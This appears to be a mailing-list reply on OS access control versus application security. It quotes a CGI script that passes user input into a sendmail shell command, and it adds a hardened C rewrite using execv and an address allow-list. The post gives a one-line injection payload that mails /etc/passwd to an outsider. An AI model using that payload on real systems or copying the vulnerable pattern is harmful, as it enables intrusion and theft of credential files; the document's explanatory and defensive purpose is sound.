> True enough. The point is, you have to identify and exploit
> appropriate holes in both sendmail and in the nonbypassable access
> control mechanism of the OS. A properly designed mechanism is going to
> present a different kind of penetration problem.

The point is that if you have a class B O/S you're more likely to skimp
on the application level stuff. If you get both, that's great, but you
usually only get one.

I just found another:

    sprintf(txt, "sendmail -f %s %s < %s",
            user_provided_string, server_provided_string, tempname);

in a web server CGI script.

Just pop "; mail phreak < /etc/passwd" in as your address...
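
Added example, not part of the original message and not the CGI script's own code: a command line built like the one above gets parsed by a shell if it is handed to system() or popen(), so the hardened form below passes the address as a single argv element to execv() and redirects stdin itself. The names addr_ok and send_mail, the mailer path parameter, and the allow-list policy are assumptions made for this sketch.

```c
#include <ctype.h>
#include <fcntl.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allow-list check for an address argument: non-empty, bounded, not
 * option-like, and made only of characters an ordinary address needs
 * (a policy chosen for this example, stricter than RFC 5322). */
int addr_ok(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 254 || s[0] == '-')
        return 0;
    for (; *s; s++)
        if (!isalnum((unsigned char)*s) && !strchr("@._+-", *s))
            return 0;
    return 1;
}

/* Run `mailer -f from rcpt` with stdin taken from tempname. The argv array
 * goes straight to execv(), so no shell ever parses the user's string.
 * Returns the child's exit status, or -1 if rejected or on error. */
int send_mail(const char *mailer, const char *from, const char *rcpt,
              const char *tempname)
{
    if (!addr_ok(from) || !addr_ok(rcpt))
        return -1;
    int fd = open(tempname, O_RDONLY);
    if (fd < 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fd); return -1; }
    if (pid == 0) {                       /* child: stdin <- tempname */
        char *argv[] = { (char *)mailer, "-f", (char *)from,
                         (char *)rcpt, NULL };
        if (dup2(fd, STDIN_FILENO) < 0) _exit(127);
        close(fd);
        execv(mailer, argv);
        _exit(127);                       /* exec failed */
    }
    close(fd);
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Even without the allow-list, the argv form alone keeps the semicolon and redirect characters from being interpreted; the check additionally stops a value beginning with "-" from being read as a mailer option.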